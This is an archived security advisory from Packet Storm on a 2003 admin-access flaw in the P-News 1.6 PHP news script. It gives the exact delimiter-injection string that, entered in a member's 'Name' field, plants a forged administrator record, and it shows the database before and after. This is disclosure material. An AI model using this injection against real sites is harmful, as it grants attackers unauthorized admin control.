exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

pnews.txt

pnews.txt
Posted May 28, 2003
Authored by Peter Winter-Smith

P-News versions 1.6 is vulnerable to a privilege escalation attack by allowing a remote attacker to populate strings with the | used for delimiting data stored about the account.

tags | exploit, remote
SHA-256 | 03e639c42ea8d778ec18f23eea9b43452efd029c4da46aeeeead26e57884221b

pnews.txt

Change Mirror Download
Admin Access Vulnerability in P-News 1.6

Url: http://www.ppopn.net

It is possible to gain admin access if you possess a 'Member'
account due to a flaw in the 'p-news.php' file.
You can inject an entire arbitrary account, including all the fields, into
the 'Name' field, which will push all the restricting details to the far end
of the data string, not allowing them to be included in the login process.
Below is an example of a normal database:

Admin|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|p-news-admin@ppopn.net|-|
Peter|-|179ad45c6ce2cb97cf1029e212046e81|-|2|-|peter@aol.com|-|

Notice the '0' denotes an 'admin' account, and the '2' denotes a 'member'
account.
Injecting:

Peter|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|none@nowhere.com|-|

Into the 'Name' field in the edit account information section will give the
malicious user admin privileges.
The database then looks like:

Admin|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|p-news-admin@ppopn.net|-|
Peter|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|none@nowhere.com|-||-|179ad45c6ce2cb97cf1029e212046e81|-|2|-|peter@aol.com|-|

================================================================

Operating system and servicepack level:
Windows/Linux/Unix + PHP

Software:
P-News 1.16 (possibly 1.17)

Under what circumstances the vulnerability was discovered:
Under a vulnerability search.

If the vendor has been notified:
The vendor has not been notified because he does not speak English, so much
confusion may arise.

How to contact you for further information:
I can always be reached at peter4020@hotmail.com

Please credit this find to:
Peter Winter-Smith of Team UEC

Thank you for your time,
-Peter

_________________________________________________________________
Sign-up for a FREE BT Broadband connection today!
http://www.msn.co.uk/specials/btbroadband

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close